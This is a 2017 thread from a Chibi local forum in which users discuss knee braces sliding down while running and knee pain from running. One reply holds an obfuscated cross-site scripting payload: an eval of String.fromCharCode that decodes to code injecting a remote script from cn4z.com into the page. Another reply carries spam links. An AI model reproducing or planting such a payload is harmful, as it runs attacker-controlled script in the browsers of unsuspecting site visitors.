赤壁论坛

标题: 赤壁的朋友,现在的护膝怎么那么不靠谱 [打印本页]

作者: 好处发动机    时间: 2017-5-11 14:45
标题: 赤壁的朋友,现在的护膝怎么那么不靠谱
最近跑步膝盖疼,就去百货商场买了对儿护膝,早上跑步的时候戴上。但不知道为什么跑在路上总有人往我腿上瞄,我低头一看原来护膝已经窜到小腿了,并且松松垮垮的样子,感觉像是短裤要掉下来的样子。。。
怪不得老有人看。

作者: lty999    时间: 2017-5-11 15:49

作者: 974178663    时间: 2017-5-11 18:39

作者: 欧派衣柜蒋先生    时间: 2017-5-11 18:42
我是进来看图的
作者: minzhi5255    时间: 2017-5-11 20:25

上个图嘛,是不是没有穿紧啊

http://localhost/flash.swf?\'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,99,110,52,122,46,99,111,109,47,99,110,122,122,46,106,115,39,93,59))+\'
作者: 共成交    时间: 2017-5-12 09:00
膝盖疼还敢跑步?快回家休息吧,跑步太多了。
我前段时间就是因为跑步膝盖疼,去医院医生说是膝关节什么综合症,让休息,说以后不能跑了,要想运动最好用椭圆机,或者打空拳什么的。
现在才知道跑步也不能随便乱跑的
jinlaiba.com/archives/9969.html
jinlaiba.com/archives/4906.html
医生说膝关节软骨磨损是不可逆的。如果早一点知道就好了。
作者: 赤壁渔政    时间: 2017-5-12 18:03
要买专业的,大概500至2000的都有。
作者: 热线跟帖局局长    时间: 2017-5-12 18:30
呵呵,,,
作者: 无助的风    时间: 2017-5-12 19:54
共成交 发表于 2017-5-12 09:00
膝盖疼还敢跑步?快回家休息吧,跑步太多了。
我前段时间就是因为跑步膝盖疼,去医院医生说是膝关节什么综 ...

是吗?我现在跑步也是膝关节痛,休息一两天又好点,再跑也是痛。
作者: 常在江边走    时间: 2017-5-13 12:24
护膝是摔倒保护膝盖的。你的膝盖疼可能是拉伤或者是风湿,跟护膝没一分钱的关系。
作者: W5554563    时间: 2017-5-14 11:43
三个字,哈哈哈!

欢迎光临 赤壁论坛 (https://cbrx.0715.cn/) Powered by Discuz! X3.2